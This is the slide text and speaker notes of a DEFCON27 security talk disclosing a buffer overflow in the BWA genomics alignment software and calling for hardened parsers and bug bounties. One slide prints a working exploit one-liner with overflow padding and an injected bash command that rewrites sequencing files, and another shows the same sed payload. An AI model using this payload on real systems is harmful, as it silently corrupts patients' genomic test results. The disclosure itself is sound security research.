DEFCON27 BioHacking Village presentation by Corey Hudson and Charles Fracchia.
In this presentation we describe a previously unreported buffer overflow vulnerability in popular genomics alignment software package BWA. We will show how this exploit, combined with well-known attacks allows an attacker to access and modify patient data and manipulate genomic tests. We then show how this class of attacks constitutes a wider threat to global biomedical infrastructure and what a newly-formed team from Sandia National Labs and BioBright are doing about it.
Speaker Bio: Corey Hudson is a computational biologist at Sandia National Laboratories. Corey leads teams in cybersecurity, machine learning, synthbio and genomics. His main work is modeling and simulating cybersecurity risks in realistic and large-scale genomic systems and highly automated synthbio facilities.
Charles Fracchia is a bioengineer who has worked at the intersection of biology and computer science for the last decade. He is the founder and CEO of BioBright a company dedicated to making biomedical workflows more data-centric and secure.
2. Corey’s Funding
Supported by the Laboratory Directed Research and
Development program at Sandia National Laboratories, a
multi-mission laboratory managed and operated by National
Technology and Engineering Solutions of Sandia, LLC, a
wholly owned subsidiary of Honeywell International, Inc., for
the U.S. Department of Energy’s National Nuclear Security
Administration under contract DE-NA0003525.
3. What is a Genome’s value? NHGRI Data (2019)
Illumina (2018)
NHGRI Estimate (2011)
$1,000
6. What issues has this growth created?
BROAD Institute Best-Practices Pipeline
ARPANET (1971)
Change in trust model
Need for standardization
& automation
7. Bio is turning Digital
ObservationSubject
Selection
Analysis
manual manual manual
8. Bio is turning Digital
automated automated automated
ObservationSubject
Selection
Analysis
21. First tool in the pipeline - BWA
1. BWA takes FASTQ files as input and maps these to a reference genome, creating a SAM file
2. In 2014, BWA developers added the ALT-aware capacity – which allowed users to map reads
to a population, rather than canonical single reference
3. Since the population is always changing and requires up-to-date knowledge, the reference is
hosted at a central repository
4. BWA provides a tool – bwa.kit, which accesses this data from the US National Center for
Biotechnology Information (NCBI), which has provided resources for the storage and delivery
of these files as a tarred and gzipped directory of indices:
ftp://ftp.ncbi.nlm.nih.gov/genomes/all/GCA/000/001/405/GCA_000001405.15_GRCh38/seqs_f
or_alignment_pipelines.ucsc_ids/
5. The user then unzips and stores the indices provided by NCBI
6. A .alt file is used to index the genome and make it alt-aware
27. Crafting an exploit
After the data are mapped – turn a single A at a
particular position in the genome into a C.
Limits
No other data in the genome can be harmed
(can’t turn all A’s to C’s)
Must change raw data (make it invisible in follow-
on analysis)
28. How to target the position – PCR trick
Running Polymerase Chain Reaction (PCR) requires primers
If you wish to find a particular nucleotide in the genome, you need
primers up and downstream of the nucleotide of interest
Chose A at position 64,544,989 on chromosome 12
Random choice (not clinically meaningful)
7 base pairs upstream and 9 base pairs downstream are sufficient to
be nearly unique
29. Full exploit delivered with over MitM
python -c "print '@' + 'A'*1500 + 'B'*1500 + 'C'*1500 + 'D'*419 +
'/bin/bash -c “sed -i
s/C.CAGA.AGCTAATGG./CACAGAACGCTAATGGG/g *.fq”’ ;
mv .hiddenAltOrig
"GCA_000001405.15_GRCh38_full_analysis_set.fna.alt";
cat ~/.bash_history | grep "bwa mem" | tail -n 1 | /bin/bash >
GCA_000001405.15_GRCh38_full_analysis_set.fna.alt
Exploit only runs once, but changes all .fq files
31. Three experiments
Setup: 3 sets of simulated reads in data directory
– finalizing as simulated_reads{A,B,C}.vcf
1. Unpatched – no exploit
2. Unpatched – Payload: sed -i
s/C.CAGA.AGCTAATGG./CACAGAACGCTAATGGG/g
3. Patched – Payload
32. Output of no exploit
Reference: Genotype AA at chromosome 12 position
64544989, position 64544989 absent from variants or A
33. Output of PayloadA – AC one-direction
Reference: Genotype AA at chromosome 12
position 64544989 – output Genotype AC
Probability that Genotype is AC vs random: P<2200.6, P<2121.6, P<2117.6
44. What needs to happen, starting now
1. Hardened parsers for common formats
2. Bug bounties for key software
3. Instrument manufacturers should
publish file format specs & parser code
45. Asks
Wanna fund bug bounties? Come talk to us
Instrument Vendors, come talk to us
Send us sample files!
https://bit.ly/2yxzy8I
Thoughts on overall structure:
Intro of who we are & disclaimer on Sandia funding
Genome’s value & pressure created by this growth
This has led to a total dependence on digital tools: biomedical research has now reached a stage where digital tools are ubiquitous and cannot be removed
HOWEVER, these tools primarily come from Academia, are poorly supported, often BOTH. Show disparity with ”industrial tools”, talk about what BB sees in the field: companies having to build their own tooling, often cobbled together from open source tools, and VERY little-to-no sensitivity and expertise in infosec
End with the long list of open source ALIGNMENT software, highlight BWA [SEGWAY for Corey]
Talk about vulnerability and context, chained attack vector and result!
PAUSE for effect
Return to diagram of fully automated biomed near-future and show how each link in the chain can be a vector of attack. Link to the wider problem
Show list of instrumentation that we often see in labs and outline the ones with INPUTS and OUTPUTS
Explain how large volumes of data (OUTPUTS) further increase reliance on digital tools and how integrity is key
Hint at the project to identify and patch vulnerabilities in bio file formats
Ask for people to contribute expertise & sample file formats
Since the birth of modern biomedicine as an observable science in the 16th century, biomedicine has been dominated by manual processes
However, we are now at a crucial inflection point for the field thanks to automation and digital tools finally becoming available
Critical Workflows rely on digital tools
Kiestra TLA on left – from Automation in Clinical Microbiology in ASM Journal of Clinical Microbiology https://doi.org/10.1128/JCM.00301-13
BROAD Somatic Cell Line Pipeline on right
Critical Workflows rely on digital tools
Kiestra TLA on left – from Automation in Clinical Microbiology in ASM Journal of Clinical Microbiology https://doi.org/10.1128/JCM.00301-13
BROAD Somatic Cell Line Pipeline on right
Imagine if your LIQUID HANDLER goes down
SEQUENCER
IMAGER
ELECTRONIC LAB NOTEBOOK
Imagine if your LIQUID HANDLER goes down
SEQUENCER
IMAGER
ELECTRONIC LAB NOTEBOOK
Critical Workflows rely on digital tools
Thoughts on overall structure:
Intro of who we are & disclaimer on Sandia funding
Genome’s value & pressure created by this growth
This has led to a total dependence on digital tools: biomedical research has now reached a stage where digital tools are ubiquitous and cannot be removed
HOWEVER, these tools primarily come from Academia, are poorly supported, often BOTH. Show disparity with ”industrial tools”, talk about what BB sees in the field: companies having to build their own tooling, often cobbled together from open source tools, and VERY little-to-no sensitivity and expertise in infosec
End with the long list of open source ALIGNMENT software, highlight BWA [SEGWAY for Corey]
Talk about vulnerability and context, chained attack vector and result!
PAUSE for effect
Return to diagram of fully automated biomed near-future and show how each link in the chain can be a vector of attack. Link to the wider problem
Show list of instrumentation that we often see in labs and outline the ones with INPUTS and OUTPUTS
Explain how large volumes of data (OUTPUTS) further increase reliance on digital tools and how integrity is key
Hint at the project to identify and patch vulnerabilities in bio file formats
Ask for people to contribute expertise & sample file formats